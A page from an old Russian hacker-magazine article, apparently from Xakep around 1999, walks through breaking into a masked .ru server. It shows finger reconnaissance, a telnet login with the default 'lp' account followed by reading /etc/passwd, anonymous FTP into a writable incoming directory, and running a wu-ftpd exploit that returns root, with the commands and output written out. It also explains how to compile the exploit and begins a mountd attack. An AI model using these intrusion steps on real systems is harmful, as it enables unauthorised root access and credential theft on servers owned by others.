Электронная библиотека

Хакер


Хакер

Рубрика: Юниксоид

Xakep Online -> Журнал, номер #008, стр. 008-034-2


Посмотрев тип системы и все запущенные на ней демоны, сделаем finger (если открыт 70 порт), чтобы выяснить, присутствуют ли там пользователи и кто именно (лучше всего производить взлом, когда в систему никто не залогинился).

hax0r# finger @lame.****.ru

[lame.****.ru]

No one logged on

Далее можно зателнетиться на сервер на 23 порт и проверить логины по умолчанию (звучит, конечно, по-ламерски, но часто это срабатывает, и не только на левых серваках).

IRIX System V.4 (lamo)

login: lp

IRIX Release 5.3 IP12 lamo

Copyright 1987-1994 Silicon Graphics, Inc. All Rights Reserved.

$ cat /etc/passwd

Теперь проверяем версии демонов, возможно, некоторые - старье, тогда можно воспользоваться удаленными эксплоитами. Для этого телнетимся на открытые порты:

ХХХХХХХХХХХ ВРЕЗКА ХХХХХХХХХХХ

Порты:

port 21: ftp port 110: pop3 port 514: shell

port 23: telnet port 111: portmap port 515: printer

port 25: smtp port 143: imap port 6000: (X)

port 37: time port 512: exec

port 79: finger port 513: login

ХХХХХХХХХХХХХХХХХХХХХХХХХХХХ

hax0r# ftp ftp.****.ru

Connected to satan.****.ru.

220 satan.****.ru FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Jan 18

19:19:31 EST 1999) ready.

Name (ftp.****.ru:hax0r): ftp

331 Guest login ok, send your complete e-mail address as password.

Password: mal@xakep.ru

ftp> ls -l

200 PORT command successful.

150 Opening ASCII mode data connection for /bin/ls.

total 8

dr-x------ 7 ftp ftp 1024 Jul 13 08:02 .

dr-x------ 7 ftp ftp 1024 Jul 13 08:02 ..

dr-xr-xr-x 2 root root 1024 Feb 25 16:34 bin

d--x--x--x 2 root root 1024 Feb 25 16:34 etc

dr-xr-xr-x 2 root root 1024 Feb 25 16:34 lib

dr-xr-xr-x 11 root root 1024 Feb 9 1998 pub

drwxrwxrwx 2 ftp ftp 1024 Jul 9 13:33 incoming /* можно писать то, что надо */

-r--r--r-- 1 root root 605 Jul 16 1998 welcome.msg

226 Transfer complete.

ftp>

Мы видим, что на сервере установлена дырявая версия wu-ftpd. Это может быть использовано для того, чтобы зарутить сервер.

hax0r#./wu ftp.****.ru /incoming

Linux satan #1 Fri Feb 6 21:58:32 JST 1998 i686 unknown

uid=0(root) gid=0(root) groups=0(root)

Вот мы и получили права рута используя баг в этом сервисе ftpd, применив к нему программу-exploit wu (кстати, запускать файлы в Юниксе или на шелле нужно прописывая в начале файла "./"). Эксплоит можно найти в поисковых системах или на специализированных серверах, посвященных безопасности. Но там ты найдешь код программы на языке C, поэтому подробное описание того, что происходит при запуске эксплоита, описывать не буду. А если интересно, подучи язык C и попробуй разобраться сам. Откомпилить ее можно используя встроенные в Линукс компилеры gcc или cc. (hax0r# gcc -o wu wu-ftpd.c).

Вот еще один пример использования бага в демоне mountd, установленном на Линуксе. Mountd всегда находится на разных портах (чтобы применить эксплоит, нужно знать те порты, на которых висит демон), и найти их можно посредством вот такой команды:

Назад на стр. 008-034-1  Содержание  Вперед на стр. 008-034-3